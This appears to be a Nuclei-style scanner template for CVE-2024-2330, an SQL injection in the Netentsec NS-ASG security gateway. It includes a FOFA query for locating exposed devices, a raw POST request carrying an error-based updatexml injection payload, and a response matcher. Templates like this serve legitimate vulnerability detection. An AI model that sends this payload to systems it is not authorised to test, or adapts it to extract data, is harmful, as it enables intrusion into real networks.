id: NS-ASG-protocol-index-sqli

info:
  name: 网康应用安全网关(NS-ASG)-SQL注入-protocol-index(CVE-2024-2330)
  author: rain
  severity: critical
  metadata: 
    fofa-query: app="网康科技-NS-ASG安全网关"
requests:
  - raw:
      - |
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        
        jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+md5(123456)),0x7e),1))='"]}



    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body, "adc3949ba59abbe56e057")'